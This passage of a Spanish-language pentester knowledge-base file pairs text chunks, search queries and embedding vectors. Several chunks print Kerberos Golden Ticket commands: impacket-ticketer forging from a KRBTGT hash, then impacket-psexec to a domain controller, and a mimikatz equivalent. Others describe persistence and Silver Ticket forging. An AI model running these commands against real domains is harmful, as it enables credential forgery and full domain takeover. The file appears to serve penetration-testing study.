0.08439, -0.03193, 0.14265, -0.00195, -0.17448, -0.02859, -0.07218, -0.14987, -0.0378, -0.20924, -0.0073, -0.0316, 0.20982, -0.00054, -0.09935, -0.08325, -1e-05, -0.07726, -0.04521, 0.03961, 0.10384, -0.00861, 0.02359, -0.02414, -0.00245, 0.02311, 0.05753, -0.04111, 0.09254, -0.07567, -0.03755, -0.02486, -0.12408, -0.01391, 0.06479, 0.19826, -0.03566, 0.0827, -0.21872, -0.02271, 0.03151, 0.01649, 0.05435, -0.08611, -0.01983, -0.08386, -0.03163, -0.01934, -0.10444, -0.08425, 0.08337, -0.07413, 0.10619, -0.10207, -0.0666, -0.00814, -0.06889, -0.10318, 0.07095, 0.00862, -0.03184, -0.14703, 0.02308, -0.12266, -0.04047, 0.05276, -0.02873, 0.04666, -0.00494, 0.12815, 0.08951, -0.10437, -0.00543, -0.11301, 0.04824, -0.00676, 0.04262, -0.03117, -0.03403, 0.1008, -0.05709, -0.16179, -0.10059, -0.07968, -0.02392, -0.00459, 0.05999, 0.07653, -0.06596, 0.04715, 0.04947, 0.04096, 0.1016, 0.04387, 0.06713, 0.05687, 0.01544, 0.02483, -0.10668, 0.18414, 0.04409, 0.10439, 0.0155, 0.00373, -0.00675, 0.03962, 0.00724, -0.0704, -0.0251, -0.0911, -0.01755, 0.07576, -0.07874, -0.10102, 0.06402, -0.06138, -0.11487, -0.0092, 0.01433, 0.07074, 0.05865, 0.00119, -0.05368, 0.01198, -0.0378, -0.01071, 0.01387, 0.00742, 0.06453, -0.08107, -0.06108, 0.04492, 0.04248, 0.01282, -0.05362, -0.12166, -0.00649, 0.00028, 0.0101, 0.0924, 0.03748, -0.00498, 0.0489, -0.06533, 0.00793, 0.04201, 0.03361, 0.06425, -0.08807, 0.03768, 0.02199, -0.01271, -0.02951, -0.01255, -0.06921, 0.01877, -0.03887, 0.00366, -0.02924, -0.01873, 0.02276, -0.05518, 0.01596, 0.03362, 0.03697, 0.10629, 0.00825, 0.07543, -0.01743, -0.04334, 0.02274, -0.00725, -0.01923, 0.00089, 0.03005, -0.00814, -0.00551, 0.05047, -0.00062, 0.03958, -0.01736, -0.00265, -0.00789, 0.03535, -0.05307, -0.013, 0.02547, 0.05412, 0.00274, -0.0476, 0.01863, -0.00327, 0.0537, -0.01923, -0.05817, -0.04954, -0.04415, 0.04929, 0.01581, -0.05557, 0.04093, 0.04518, -0.01394, 0.05385, 0.04582, 0.03471, -0.06028, -0.0209, 0.05574, 0.0152, -0.0817, -0.00671, -0.03512, 0.05151, -0.02965, -0.02385, -0.03504, 0.01057, 0.03352, -0.005, 0.03794, -0.00116, -0.00163, -0.01439, 0.02065, 0.02025, -0.03973, -0.03554, -4e-05, -0.03237, 0.0229, 0.00831, -0.00925, 0.01532, 0.00474, -0.05759, -0.0434, 0.05329, 0.00499, -0.0532, -0.05106, -0.00486, -0.0733, 0.01793, -0.01662, -0.00058, 0.01922, 0.02597, -0.01486, -0.07424, -0.01776, 0.00504]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "indexar": "con que puedo montar el acceso lateral en un entorno corporativo si tengo el hash de la cuenta KRBTGT?", "v": [0.05509, -0.00226, -0.17628, -0.08058, -0.10483, -0.15415, -0.00699, 0.19216, -0.12632, -0.10376, -0.11368, 0.04874, 0.05777, 0.05819, 0.15134, 0.16503, -0.08186, -0.09615, -0.11478, 0.00597, -0.00477, -0.11082, 0.06184, 0.06006, 0.08629, -0.00617, -0.00176, 0.07382, -0.07511, 0.10369, 0.06803, 0.07133, -0.08334, 0.10155, -0.01607, -0.13682, -0.01464, 0.12307, 0.12087, 0.04121, 0.11558, 0.00565, -0.03357, 0.14804, 0.12008, -0.04891, -0.04841, -0.04702, -0.02879, -0.01516, 0.0153, 0.0094, -0.11676, -0.04831, -0.03788, -0.02558, 0.15994, -0.05877, 0.05991, -0.08364, 0.0214, 0.07989, -0.0123, 0.02676, -0.08249, -0.09614, 0.06868, 0.03963, -0.09936, -0.02669, -0.10058, -0.09763, -0.03914, -0.0186, -0.02498, 0.11103, -0.00589, 0.01571, 0.08469, 0.10413, -0.01894, -0.00462, 0.04458, 0.06244, -0.21607, -0.06756, 0.06024, -0.03562, 0.06584, -0.00798, 0.00627, 0.01914, 0.00936, -0.06639, -0.0975, -0.03898, -0.02097, 0.0581, -0.09057, 0.00295, -0.07291, 0.04329, -0.07018, 0.06134, -0.01575, 0.01384, 0.01084, -0.12657, 0.13754, -0.02769, 0.04406, -0.00424, -0.06706, 0.02474, -0.05552, -0.06221, -0.03394, 0.02148, -0.00875, 0.03668, -0.01992, -0.00576, 0.09511, 0.0222, -0.04353, -0.08751, 0.00851, 0.02226, -0.03577, -0.012, -0.052, 0.0922, -0.06217, -0.05959, -0.0553, 0.0272, -0.05396, 0.03971, -0.01698, -0.03984, 0.00934, 0.0118, -0.01731, -0.08049, 0.08484, 0.06316, 0.01169, -0.0503, 0.00631, 0.0612, 0.0277, 0.03857, 0.01576, -0.02783, -0.069, 0.01355, 0.01585, 0.00795, 0.02549, 0.07892, -0.03541, 0.0584, -0.05182, 0.06901, -0.00965, -0.05861, 0.01202, -0.08149, 0.05035, 0.0104, -0.09307, 0.02174, 0.02515, -0.03719, 0.05118, -0.03872, -0.03591, -0.03889, 0.01518, 0.01311, -0.01312, -0.0371, -0.03353, -0.03589, -0.02628, 0.004, 0.03188, 0.02793, 0.04643, -0.00873, -0.02421, 0.06674, -0.03689, 0.04835, 0.04287, -0.02691, -0.01002, -0.00711, 0.03584, -0.03143, -0.00666, 0.03984, -0.01526, -0.05838, 0.07128, 0.01304, -0.07112, 0.10419, -0.02613, 0.05207, 0.07684, -0.01537, 0.05335, -0.03986, -0.07168, -0.0121, -0.00959, -0.02368, 0.00575, 0.05668, 0.02055, 0.04434, 0.09849, -0.02075, -0.01053, -0.0199, -0.01249, 0.02696, 0.00993, 0.00917, 0.01075, 0.02937, -0.0444, -0.01916, 0.00189, 0.03536, 0.03787, 0.01711, -0.04209, -0.036, 0.05714, 0.02941, -0.00896, -0.01439, -0.03901, -0.06601, -0.09402, 0.02928, -0.03562, -0.0751, -0.02909, 0.00344, 0.01289, -0.01968, -0.00123, -0.03233]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "indexar": "quΓ© herramienta sirve para obtener credenciales de Kerberos", "v": [-0.16694, -0.05968, -0.05589, -0.05582, 0.11618, -0.2202, -0.04414, 0.10611, 0.02404, -0.19216, -0.1583, 0.03662, -0.03083, -0.19234, 0.17089, 0.11696, 0.00078, -0.08937, 0.07176, 0.07133, 0.06863, 0.02509, -0.1002, -0.07619, -0.14355, 0.00979, 0.00028, -0.07352, -0.08096, 0.13496, -0.02185, 0.04336, -0.03388, -0.0332, -0.083, 0.00785, -0.16293, 0.12355, -0.04607, 0.12755, 0.00918, 0.06683, 0.06511, 0.07414, 0.02698, 0.00267, -0.05397, 0.06875, -0.05699, 0.05888, 0.0184, -0.15667, -0.09991, -0.06147, -0.01415, -0.0912, 0.09738, -0.13149, -0.02188, -0.09333, -0.13565, -0.06519, -0.0736, -0.02903, 0.0048, -0.14388, -0.01006, -0.09269, -0.05301, 0.00297, -0.0874, 0.03085, 0.13238, 0.01205, -0.02378, -0.03142, 0.00429, 0.06064, 0.00923, -0.01138, 0.11452, -0.01546, -0.04422, 0.01216, 0.02828, -0.09742, 0.08171, -0.00428, -0.00688, -0.03744, -0.01942, 0.13124, -0.00121, 0.00563, -0.0064, 0.00966, -0.05402, -0.02813, -0.04084, -0.00963, 0.0754, -0.13845, -0.06892, 0.0349, -0.065, 0.01449, -0.03363, 0.04322, -0.07437, -0.06437, 0.0908, 0.06212, 0.0058, 0.05303, -0.0194, 0.13316, -0.0333, -0.03965, 0.02244, -0.00358, 0.04454, 0.03159, -0.02549, -0.06794, -0.0318, 0.02762, -0.02575, 0.04603, -0.04276, -0.08769, -0.00975, -0.03896, -0.03924, 0.03052, 0.01666, -0.05445, -0.0117, -0.12386, -0.07374, 0.00316, 0.01911, 0.03098, -0.05875, -0.11209, -0.01496, 0.00411, 0.04961, -0.0056, 0.06556, -0.09208, 0.02505, -0.01367, -0.03008, -0.01375, -0.03043, -0.03649, -0.00718, 0.00235, -0.08347, 0.02399, -0.05425, -0.09385, 0.07597, 0.06122, 0.02195, -0.06775, 0.042, 0.0062, 0.06081, 0.12877, 0.04231, -0.00112, 0.03563, -0.03392, 0.0007, -0.02812, -0.00688, 0.01275, -0.04943, -0.08455, 0.02609, -0.00532, -7e-05, -0.00413, 0.02823, -0.00408, 0.0256, -0.01826, -0.00891, 0.01441, 0.02744, -0.02548, 0.01455, -0.05929, 0.03061, 0.0338, 0.02802, -0.06713, 0.03892, -0.01049, -0.08356, -0.00424, 0.0156, -0.0141, 0.07094, 0.08955, 0.02397, -0.02354, -0.01382, 0.07284, 0.03683, -0.02915, 0.03617, -0.03679, -0.01547, -0.02029, 0.00535, 0.01883, -0.03736, 0.00142, 0.02575, -0.0316, -0.00987, 0.00203, -0.00377, 0.03497, 0.00283, -0.0148, -0.01576, 0.00874, 0.02314, -0.03839, -0.03473, 0.01901, 0.01034, -0.0667, 0.02571, 0.03073, -0.0222, -0.04324, -0.02468, 0.00686, 0.02124, -0.00364, -0.0345, -0.02668, 0.016, -0.03683, -0.00581, -0.0189, -0.04162, -0.01161, 0.02093, -0.00576, 0.02026, -0.02161]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "indexar": "con quΓ© puedo montar un ataque de Golden Ticket", "v": [-0.11169, 0.00785, -0.07391, -0.05122, -0.25439, 0.13218, -0.04113, 0.11588, -0.0697, -0.00395, 0.0092, 0.01006, -0.03794, 0.10679, 0.07506, 0.03566, 0.05642, -0.05239, 0.12756, -0.02357, 0.009, 0.03018, 0.09892, -0.21294, 0.07047, 0.01888, 0.073, 0.07689, -0.03607, -0.04623, 0.07892, -0.10593, -0.09007, -0.04449, 0.00774, -0.1674, 0.0039, 0.10812, 0.10144, -0.02972, -0.03761, -0.04398, -0.04863, 0.00859, 0.12361, -0.08239, 0.08162, 0.06355, -0.05766, -0.02385, 0.12931, 0.06395, -0.08987, -0.08303, -0.01253, -0.0228, 0.00183, -0.06617, 0.00233, 0.06637, -0.07018, -0.01897, -0.06735, 0.03054, -0.05769, 0.10896, -0.01615, 0.05061, -0.03552, -0.04066, -0.01829, -0.03739, -0.01455, 0.09986, 0.06747, -0.02061, 0.09086, 0.06266, 0.01222, 0.08955, 0.04494, 0.02598, -0.01926, 0.06824, 0.01252, -0.0261, 0.04702, -0.14384, -0.11253, -0.01345, -0.01056, -0.02976, 0.04189, -0.05384, -0.08021, -0.12871, -0.05, -0.04989, -0.08229, 0.0328, -0.05218, -0.03504, -0.03801, 0.13053, 0.0283, 0.02436, -0.00637, -0.07878, -0.00561, -0.10572, -0.10168, 0.00652, -0.18428, -0.02725, -0.01605, -0.06057, -0.00039, 0.06557, 0.04887, 0.02308, -0.0014, 0.0441, -0.01962, 0.03075, -0.01009, 0.0267, 0.05823, -0.00728, -0.05139, -0.01272, -0.07221, 0.04884, 0.06131, -0.03805, 0.00905, 0.05653, -0.03094, -0.13088, 0.0093, 0.0951, 0.04343, -0.03037, 0.01116, -0.02643, -0.00316, -0.03855, -0.02522, -0.02967, -0.075, 0.01126, 0.03541, 0.01867, 0.01273, 0.11758, -0.0799, -0.02451, 0.02202, -0.00249, -0.01478, 0.09942, -0.01705, 0.07926, -0.09596, 0.06811, -0.00733, 0.01319, -0.0415, -0.02013, 0.03581, 0.04825, 0.03544, 0.03237, 0.05263, 0.00153, 0.01065, -0.07044, -0.07584, -0.03681, 0.09046, -0.01644, 0.09229, -0.02799, -0.05051, 0.07221, -0.06055, 0.0046, 0.0586, 0.01364, 0.05225, 0.04363, -0.04737, 0.00099, 0.05031, 0.07754, 0.03949, -0.14043, -0.04073, -0.00201, -0.0036, -0.02102, -0.00346, -0.02555, -0.0336, 0.01663, 0.12627, 0.02906, -0.0387, 0.02555, -0.01133, 0.10685, 0.0323, -0.02691, 0.12449, -0.07486, -0.04003, 0.00845, 0.01879, 0.0005, -0.04003, 0.02965, 0.08977, 0.01887, 0.05818, 0.01468, -0.00661, -0.04165, -0.0257, -0.03282, 0.082, 0.06278, 0.02562, -0.03192, -0.01052, 0.02763, 0.03969, -0.02078, 0.0567, -0.00911, -0.09329, 0.06354, 0.01172, 0.04355, 0.00793, 0.03519, 0.0151, -0.02297, -0.029, 0.07195, 0.03107, -0.04355, -0.01497, 0.02034, -0.03116, -0.06313, 8e-05, -0.01256]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "indexar": "cual es una alternativa libre a mimikatz", "v": [0.03504, 0.0461, -0.08578, 0.08085, -0.11169, 0.06237, -0.26355, 0.03134, -0.12685, -0.12386, 0.1034, -0.03714, 0.10038, 0.12457, 0.14222, -0.06226, 0.16825, -0.00128, 0.0865, -0.00201, 0.05445, -0.05561, -0.00573, -0.09411, 0.00751, -0.04726, 0.07878, 0.02627, -0.08143, 0.04333, -0.0089, 0.03194, 0.06329, -0.04038, 0.0259, 0.10004, 0.15811, -0.00903, 0.16738, -0.01599, -0.09455, -0.00879, -0.10159, 0.05485, -0.03562, -0.04272, -0.08734, 0.06792, -0.00624, 0.12247, -0.04487, -0.02011, -0.0014, 0.0709, 0.10223, -0.07322, 0.0901, -0.11325, -0.0566, -0.00058, -0.06353, 0.03702, -0.05442, -0.01458, -0.00353, 0.0075, -0.04377, -0.06782, -0.08003, 0.08788, 0.06843, -0.05798, 0.03535, -0.06812, -0.07254, 0.06788, -0.14349, -0.05941, -0.02598, -0.01871, 0.00253, -0.06918, -0.02906, 0.09293, -0.03589, -0.07217, 0.0661, -0.09573, -0.04585, 0.09064, 0.01451, 0.01935, 0.04076, 0.03671, -0.05804, -0.11989, -0.0721, 0.07485, 0.0046, 0.07656, 0.10717, 0.03363, -0.21961, -0.01715, -0.06531, 0.00861, -0.01618, -0.0442, -0.02674, 0.02146, -0.00385, 0.00153, -0.01222, -0.01545, -0.01287, 0.02504, 0.02262, 0.02329, 0.00707, -0.03482, -0.01111, 0.04346, -0.02027, -0.10197, -0.00751, 0.01122, 0.00198, -0.00566, -0.04453, 0.06425, 0.06732, -0.00942, -0.01443, -0.12832, -0.02323, -0.08246, 0.09786, -0.06868, 0.0233, -0.02924, -0.02696, -0.00284, 0.02563, -0.03274, 0.0901, -0.05178, 0.03849, -0.10886, 0.00181, -0.02019, -0.06015, 0.0533, 0.05184, 0.08384, 0.05459, 0.03527, -0.05245, 0.00729, -0.05395, 0.06203, 0.0837, -0.03767, 0.04181, 0.02536, 0.00965, -0.00478, -0.10459, -0.05837, -0.03401, -0.00738, 0.01037, 0.0278, 0.08807, 0.02288, 0.05125, 0.00962, -0.06615, -0.04271, 0.03209, -0.07738, 0.02979, 0.03181, -0.03217, -0.02565, 0.03587, -0.11097, -0.00437, 0.03895, 0.00086, 0.01924, -0.04374, -0.03918, -0.09297, -0.08834, -0.04316, -0.06036, 0.06367, -0.06756, 0.00589, -0.00908, 0.00883, -0.02887, 0.01702, -0.01359, -0.01345, 0.05743, -0.03564, 0.02416, 0.03767, -0.00208, 0.08576, 0.00072, 0.10775, 0.02465, 0.01178, 0.04068, -0.06273, -0.06362, 0.00433, -0.04882, 0.01984, -0.00017, 0.04593, 0.04085, -0.04389, 0.06143, 0.03813, 0.09429, -0.01232, 0.04451, 0.00178, -0.01181, 0.0355, -0.00866, 0.04274, -0.00247, 0.05834, -0.00802, 0.01477, -0.06855, 0.06538, 0.04593, -0.0524, -0.02026, -0.02531, 0.01733, -0.11374, 0.04387, 0.00118, -0.02536, 0.03278, 0.00659, 0.01729, 0.03702, 0.00448, -0.04636]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets vΓ‘lidos a voluntad β†’ persistencia total.\n\nRelacionado: Silver Ticket Β· DCSync Β· Pass-the-Hash Β· OSCP MOC", "indexar": "que herramienta sirve para firmar todos los tickets Kerberos de un dominio?", "v": [0.00017, -0.04726, -0.11923, -0.13507, 0.04734, -0.21055, -0.02257, 0.05024, -0.0346, -0.08369, -0.05441, -0.0724, 0.07007, -0.21195, 0.11338, 0.03745, 0.111, -0.07852, 0.08704, 0.00875, 0.08339, 0.0838, -0.02668, -0.06621, -0.0972, -0.14058, 0.0383, -0.11145, -0.14531, 0.13867, 0.05936, -0.01748, 0.0275, -0.09824, 0.01331, -0.11497, -0.0738, 0.12127, 0.02928, 0.13218, 0.00718, 0.09378, -0.02606, 0.11636, -0.13324, 0.01511, -0.03612, -0.01023, 0.08292, -0.04571, 0.01511, -0.182, -0.13531, -0.01537, -0.03456, -0.12113, 0.16065, -0.11588, -0.04942, -0.10053, -0.13761, -0.15128, -0.13922, 0.01144, -0.02656, -0.10723, 0.00581, -0.01327, 0.02247, -0.02047, -0.09998, 0.03007, 0.07304, 0.02829, 0.05905, -0.00423, 0.09299, -0.03068, 0.08187, 0.00524, 0.06473, 0.01384, -0.09665, -0.00122, -0.0039, -0.10645, -0.02815, -0.08093, 0.02252, 0.0212, 0.0636, 0.09145, 0.01052, -0.07561, -0.00984, -0.06833, 0.02808, -0.09283, -0.04618, -0.0454, 0.11308, 0.03932, -0.04795, -0.04108, -0.01889, 0.0328, -0.04735, -0.0345, -0.03104, 0.05234, 0.0399, 0.02418, -0.05706, -0.00601, -0.03494, 0.0997, -0.02974, -0.01972, 0.04563, 0.024, 0.04653, 0.00205, -0.06509, -0.11112, 0.00234, -0.00147, -0.03515, 0.01907, -0.02845, -0.08859, 0.02418, 0.02075, -0.09935, 0.01221, -0.02223, 0.0315, -0.0162, -0.05491, -0.03155, -0.01328, 0.05589, 0.04683, -0.09459, -0.02087, 0.04098, 0.00308, 0.01644, -0.04084, -0.03031, -0.03257, -0.03429, -0.03912, -0.03332, 0.0919, 0.0006, 0.03888, -0.0407, 0.00871, -0.06525, 0.0783, -0.07132, -0.06673, 0.02069, 0.05918, 0.01681, -0.03607, -0.03563, -0.03214, 0.01871, 0.09971, 0.0262, 0.03879, 0.05232, 0.03689, 0.01799, -0.07812, 0.01007, 0.02607, 0.00402, -0.05883, -0.00987, -0.05557, 0.00911, 0.05211, 0.01196, 0.04445, 0.06769, -0.06173, 0.02056, 0.02841, 0.04913, 0.03805, -0.03481, -0.00935, -0.03064, -0.01589, -0.06208, -0.05633, 0.0188, -0.01846, -0.0758, -0.01272, -0.00877, -0.02383, 0.04153, 0.04879, -0.03463, -0.03297, -0.00174, -0.00528, 0.02179, -0.04087, 0.01208, -0.05776, 0.00489, -0.00046, 0.00227, -0.00274, -0.03334, -0.02169, 0.04796, -0.00159, 0.03705, -0.0565, 0.04507, -0.00894, 0.04981, -0.0286, 0.02595, 0.00512, 0.03143, 0.01821, 0.00471, -0.00564, 0.03208, -0.0345, 0.07686, -0.00756, -0.07331, -0.01387, -0.01717, 0.03537, 0.01733, -0.01946, -0.06533, -0.06656, -0.04521, -0.01553, 0.00578, -0.04743, 0.00834, 0.00807, 0.05577, 0.02075, 0.01171, -0.06546]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets vΓ‘lidos a voluntad β†’ persistencia total.\n\nRelacionado: Silver Ticket Β· DCSync Β· Pass-the-Hash Β· OSCP MOC", "indexar": "con que puedo generar una persistencia controlando el hash de los TGT?", "v": [-0.10876, -0.01342, -0.13866, -0.01273, 0.11766, 0.02448, -0.14703, 0.1294, 0.08974, 0.11112, -0.12971, 0.14566, 0.08, 0.04823, 0.02009, 0.09809, 0.00932, -0.05346, -0.09005, 0.11295, 0.02031, -0.02737, 0.07199, -0.10259, 0.0956, -0.05449, -0.00366, -0.00266, -0.24591, -0.02012, -0.03524, -0.13403, -0.11663, 0.02536, -0.11719, 0.06605, -0.12176, 0.22464, 0.11151, 0.14163, -0.03314, 0.01186, 0.01955, 0.00636, 0.06031, -0.03036, -0.05692, -0.01895, 0.0051, 0.05215, -0.02798, 0.00989, -0.16552, 0.02522, -0.0461, -0.05117, 0.05777, -0.05977, -0.0881, -0.06252, -0.05051, -0.04011, 0.05668, 0.04127, -0.05695, -0.01222, -0.02645, 0.01206, -0.09095, 0.07741, -0.12283, 0.04533, -0.03963, 0.00208, -0.02067, 0.0668, -0.08171, 0.06567, 0.03525, 0.05091, -0.09019, 0.00415, -0.01718, -0.01152, 0.0021, -0.03859, -0.06441, -0.19641, 0.00562, -0.0475, -0.03104, -0.0123, 0.03468, 0.01604, -0.07314, -0.01477, 0.02029, -0.01788, 0.03045, 0.03133, 0.0083, -0.07769, -0.06506, 0.09311, 0.14094, -0.03648, 0.17072, -0.04826, 0.01583, 0.06837, 0.02212, -0.00656, 0.00407, 0.01654, 0.0038, -0.01988, -0.02372, -0.00216, 0.07226, -0.06038, 0.01318, 0.04992, 0.07787, 0.02894, 0.11344, -0.01402, 0.01198, 0.09438, -0.02107, -0.00664, 0.02455, 0.1046, -0.03893, -0.02004, 0.04249, 0.01629, 0.04204, 0.03296, -0.03313, 0.00644, 0.03988, 0.1128, 0.02258, -0.04438, 0.0691, -0.06983, -0.0733, 0.02754, -0.05631, -0.00065, 0.00705, -0.01741, 0.09862, -0.04092, -0.03047, 0.02761, -0.03161, -0.06821, 0.01016, 0.02596, -0.01999, -0.01016, -0.13543, -0.03298, 0.03622, -0.06255, -0.04874, 0.0361, -0.03803, -0.00694, -0.03868, -0.02934, 0.00378, -0.05892, 0.03211, -0.08352, -0.05807, -0.07512, -0.02428, -0.03355, 0.00643, -0.06502, -0.1171, 0.00945, -0.00912, 0.01106, -0.00097, 0.05383, 0.06184, 0.0387, 0.03393, 0.06894, -0.01049, -0.01931, -0.01899, 0.00419, 0.06516, 0.01206, 0.01956, -0.01222, -0.00423, -0.04651, 0.04885, -0.05087, -0.01069, 0.01088, -0.06816, 0.06038, 0.04544, -0.01917, 0.05214, 0.05162, 0.02113, 0.01007, -0.05688, 0.05271, -0.01098, -0.04354, 0.02217, -0.05052, 0.02276, 0.01904, 0.06966, 0.05365, -0.01427, -0.03119, 0.04541, 0.04235, 0.04091, 0.054, 0.00359, -0.01684, 0.01595, -0.01919, -0.03128, 0.01027, 0.01659, 0.02467, -0.00187, -0.03682, -0.04264, 0.06322, -0.0185, -0.04455, -0.0188, -0.08444, -0.08553, 0.05898, -0.03505, -0.04351, -0.0115, 0.03686, 0.01149, 0.0341, -0.02352, -0.02729]} +{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Concepto\nkrbtgt firma **todos** los TGT (Kerberos). Si controlas su hash, firmas tickets vΓ‘lidos a voluntad β†’ persistencia total.\n\nRelacionado: Silver Ticket Β· DCSync Β· Pass-the-Hash Β· OSCP MOC", "indexar": "cual es una alternativa libre a la firma masiva de tickets Kerberos?", "v": [-0.0522, -0.05803, -0.02387, 0.05965, -0.07169, -0.12722, -0.05233, 0.0507, -0.15641, -0.16466, -0.08414, -0.17086, 0.06181, 0.03233, 0.21044, -0.01477, 0.03128, -0.09417, 0.21474, 0.01285, 0.04537, 0.06121, -0.06524, -0.07164, -0.10516, -0.08901, 0.01701, -0.07725, -0.13726, 0.07511, 0.02731, 0.01546, 0.00631, -0.0772, 0.05105, 0.04179, 0.01995, 0.1168, 0.11266, -0.0503, 0.02026, 0.0191, -0.0015, 0.07503, -0.02481, -0.11151, -0.10179, 0.0452, -0.02288, 0.00234, -0.05053, -0.03385, -0.11209, 0.02781, 0.07121, -0.08987, 0.03814, -0.0987, -0.05941, 0.03185, -0.08468, -0.07693, -0.11919, 0.02541, 0.0098, -0.01689, -0.02295, -0.08152, 0.00566, -0.06197, -0.00477, -0.01739, 0.03239, 0.04524, -0.00498, 0.07888, 0.01201, -0.00595, -0.05181, 0.10466, 0.10008, -0.0581, -0.01727, 0.05561, 0.03617, -0.13766, 0.05383, -0.01314, -0.06436, 0.08882, 0.06453, 0.03892, 0.07438, 0.08418, -0.00785, -0.10335, -0.04452, 0.04739, -0.08034, 0.04537, -0.06357, 0.06551, -0.04093, -0.10795, -0.05013, 0.02272, -0.10657, 0.03971, -0.03333, 0.06084, 0.01975, 0.0497, -0.02155, 0.00779, -0.03435, -0.00944, 0.01118, 0.03269, 0.02137, 0.09599, 0.00875, -0.01671, 0.0064, -0.17305, 0.01043, -0.00521, 0.06927, 0.08502, -0.05901, -0.04196, 0.1122, 0.04988, -0.07479, -0.04828, -0.07505, -0.04545, -0.0537, 0.01134, 0.03444, 0.02669, 0.01772, 0.05925, -0.00024, 0.00059, 0.08201, 0.00212, -0.05227, 0.00641, -0.02888, 0.00694, -0.08988, 0.01224, -0.04979, 0.16113, -0.02934, 0.06363, -0.01517, -0.02817, -0.04706, 0.16245, 0.00279, -0.05112, 0.00211, 0.08824, 0.0026, -0.00104, -0.06815, -0.0458, -0.08092, 0.07309, 0.00089, 0.05601, 0.09104, -0.01179, 0.05799, -0.04188, 0.02914, -0.08023, 0.02952, -0.0368, 0.05812, -0.01307, -0.02763, 0.01842, 0.01341, -0.01137, 0.03772, -0.01589, 0.0846, 0.01921, 0.0103, 0.0282, -0.06358, -0.07355, -0.06005, -0.02703, -0.03133, -0.10431, -0.01825, 0.00646, -0.1129, -0.01609, -0.02768, -0.02062, 0.0188, -0.01285, -0.01251, 0.03121, 0.01579, 0.03082, 0.0697, -0.04628, 0.0708, -0.00824, -0.07829, -0.01833, 0.03965, -0.04895, 0.03115, 0.05774, 0.0527, 0.00359, 0.05627, -0.01091, -0.00797, -0.01255, 0.07072, 0.03242, -0.02476, -0.0105, 0.0064, 0.04652, 0.01981, 0.00019, 0.01691, 0.00781, 0.03148, 0.02006, -0.0243, 0.00348, 0.08488, 0.08032, -0.02798, 0.02326, -0.07342, -0.00455, -0.11921, -0.03511, -0.01353, -0.01798, -0.05019, 0.01033, 0.00044, 0.00856, 0.04396, -0.05728]} +{"tipo": "pregunta", "herramienta": "Silver Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Silver Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Silver Ticket\n\n> Forjas un **TGS** para **un servicio concreto** usando el hash NTLM de **esa cuenta de servicio** (no del krbtgt). MΓ‘s sigiloso que el Golden Ticket: **no habla con el DC**. Fuente: oscp.trastero.org/activedirectory.", "indexar": "que programa puedo usar para forjar un Silver Ticket sin contactar con el DC?", "v": [-0.1781, 0.00499, -0.18832, -0.16298, -0.07499, -0.13114, -0.05281, 0.01953, -0.04623, 0.04805, -0.02799, -0.18979, -0.08065, -0.19959, -0.07421, -0.07731, 0.09287, -0.0898, 0.10114, -0.08084, 0.13885, 0.04969, 0.02171, -0.15921, 0.00385, 0.06613, 0.02969, -0.01226, -0.08037, 0.03312, 0.06961, -0.04901, 0.14186, -0.04728, 0.08632, -0.02249, 0.0479, 0.07397, 0.08128, -0.0576, 0.06354, 0.01602, -0.03698, 0.11549, 0.03779, 0.00376, 0.07874, -0.07941, -0.07438, -0.10903, -0.06544, 0.03972, -0.12186, 0.05656, -0.04671, -0.05775, -0.10245, -0.00148, 0.01183, -0.02959, 0.02677, -0.03099, -0.03942, 0.06829, -0.00911, 0.02761, 0.02079, -0.02465, -0.07255, -0.01429, -0.03726, 0.03527, 0.05831, 0.02995, 0.05728, -0.00534, 0.03545, -0.09652, 0.08672, -0.00534, -0.02485, 0.06144, 0.07865, 0.08604, -0.02169, 0.046, 0.16661, -0.06103, -0.09933, -0.04094, -0.01278, 0.03257, 0.0334, -0.01025, 0.08253, -0.17941, -0.01028, 0.05508, -0.03174, 0.02183, 0.00677, -0.04036, 0.00243, 0.06563, -0.06703, -0.01492, 0.14413, -0.04732, -0.0073, 0.07352, -0.05192, 0.02701, -0.08046, -0.05708, -0.11516, 0.0685, 0.00661, -0.03418, 0.04278, -0.05916, -0.00858, 0.00889, -0.02911, -0.11398, 0.13573, 0.05853, -0.01757, 0.07758, -0.01273, 0.05125, -0.02594, 0.00492, -0.00431, -0.05124, 0.00644, -0.0331, -0.01221, 0.0154, 0.01654, 0.07124, 0.0772, 0.02115, 0.03319, -0.0018, 0.03739, 